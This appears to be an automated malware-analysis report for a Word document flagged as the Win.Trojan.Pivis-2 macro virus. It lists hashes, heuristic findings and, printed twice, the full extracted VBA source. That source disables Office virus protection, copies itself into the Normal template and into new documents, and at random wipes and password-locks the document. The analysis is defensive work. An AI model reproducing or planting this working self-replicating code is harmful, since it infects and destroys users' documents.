Office (OLE) malware analysis — malicious · 740d54bba65a73bc

MALICIOUS

Office (OLE)

27.5 KB Created: 2001-08-28 16:48:00 Authoring application: Microsoft Word 10.0 First seen: 2014-02-09

MD5: 90cf8c205078210d7fd15589b9f0a71b SHA-1: 817f6cc4d7415143a1ee485ad6eba09a5bb85356 SHA-256: 740d54bba65a73bc77d0fe12bb0e85219ede034dbfdebf698e757c128bf15c94

148 Risk Score

Heuristics 4

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1950 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1950 bytes
SHA-256: `bc9a5185b76854c0365f0103b75d3070d796216b32e3559a6f6d025d4accd598`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Randomize Timer Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap viruscode = Activecl.lines(1, Activecl.countoflines) Normalcl.insertlines 1, viruscode InfecteerDeHap: If Activecl.countoflines > 0 Then GoTo Doeii viruscode = Normalcl.lines(1, Normalcl.countoflines) Activecl.insertlines 1, viruscode ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument Doeii: x = Int(Rnd * 100) If x = 11 Then MsgBox "w97.LAM by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..." If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje" With ActiveDocument.VBProject.VBComponents.Item(1).codemodule .ReplaceLine 39, "Sub ToolsMacro()" .ReplaceLine 40, "'(c) LiFEwiRE 2000" .ReplaceLine 42, "Sub ViewVBCode()" .ReplaceLine 43, "'www.coderz.net - www.shadowvx.org" End With '(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r 't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r! End Sub Private Sub Document_new() Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule viruscode = Normalcl.lines(1, Normalcl.countoflines) Activecl.insertlines 1, viruscode ActiveDocument.Saved = True End Sub

SHA-256: bc9a5185b76854c0365f0103b75d3070d796216b32e3559a6f6d025d4accd598

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Randomize Timer
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
If Normalcl.countoflines > 0 Then GoTo InfecteerDeHap
viruscode = Activecl.lines(1, Activecl.countoflines)
Normalcl.insertlines 1, viruscode
InfecteerDeHap:
If Activecl.countoflines > 0 Then GoTo Doeii
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Fileformat:=wdDocument
Doeii:
x = Int(Rnd * 100)
If x = 11 Then MsgBox "w97.LAM by LiFEwiRE [www.shadowvx.org]", , "...::LiFEwiRE::..."
If x = 25 Then ActiveDocument.Content = "LiFEwiRE2000 - www.shadowvx.org": ActiveDocument.Password = "pietje"
With ActiveDocument.VBProject.VBComponents.Item(1).codemodule
.ReplaceLine 39, "Sub ToolsMacro()"
.ReplaceLine 40, "'(c) LiFEwiRE 2000"
.ReplaceLine 42, "Sub ViewVBCode()"
.ReplaceLine 43, "'www.coderz.net - www.shadowvx.org"
End With
'(c) 2OOO by LiFEwiRE... writt3n 4g4inst my phucking 3x-sk3wl... i c4n c0de ring0 p0ly P3 1nf3ct0rs, but w0rd is 4 b3tt3r
't4rg3t in w97... I kn0w this c0d3 w0n't spr34d 0utzide sk3wl, wh0 cares? Th3 b3tt3r!
End Sub

Private Sub Document_new()
Set Normalcl = NormalTemplate.VBProject.VBComponents(1).codemodule
Set Activecl = ActiveDocument.VBProject.VBComponents(1).codemodule
viruscode = Normalcl.lines(1, Normalcl.countoflines)
Activecl.insertlines 1, viruscode
ActiveDocument.Saved = True
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.